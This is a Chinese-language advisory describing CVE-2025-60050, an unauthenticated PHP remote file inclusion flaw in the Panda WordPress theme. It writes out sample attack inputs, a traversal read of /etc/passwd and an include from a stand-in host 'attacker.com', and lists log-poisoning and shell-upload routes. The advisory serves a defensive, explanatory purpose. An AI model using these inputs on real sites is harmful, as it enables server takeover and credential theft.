CVE-2025-60050CVE-2025-60050是WordPress Panda主题中的一个高危安全漏洞,CVSS评分达到8.1分。该漏洞属于PHP远程文件包含(Remote File Inclusion)类型,存在于axiomthemes开发的Panda主题中,版本从n/a至1.21均受影响。漏洞的根本原因在于PHP程序对include/require语句中文件名参数缺乏充分的验证和过滤,攻击者可以通过构造恶意请求操控文件包含路径,从而包含任意本地或远程文件。在特定配置下,攻击者可能利用此漏洞实现远程代码执行,获取服务器完全控制权。由于该漏洞无需认证即可利用,且对机密性、完整性和可用性均造成严重影响,因此被评定为高危漏洞。建议受影响的用户立即采取防护措施并关注官方更新。
该漏洞是典型的PHP文件包含(File Inclusion)漏洞,主要源于PHP应用程序对用户输入的文件路径参数缺乏严格的验证。在Panda主题的代码中,可能存在类似include($_GET['file'])或require($_REQUEST['template'])等不安全的使用方式。攻击者可以通过URL参数注入恶意文件路径,例如:?file=../../../../etc/passwd 或 ?file=http://attacker.com/malicious.txt。在PHP配置允许的情况下(如allow_url_include=On),攻击者甚至可以包含远程文件,实现远程代码执行。典型的利用场景包括:1)读取服务器敏感文件如/etc/passwd、wp-config.php等;2)通过日志文件注入PHP代码并包含执行;3)利用session文件或上传功能getshell。防御此类漏洞的关键是在包含文件前进行严格的输入验证,最好使用白名单机制限制可包含的文件范围。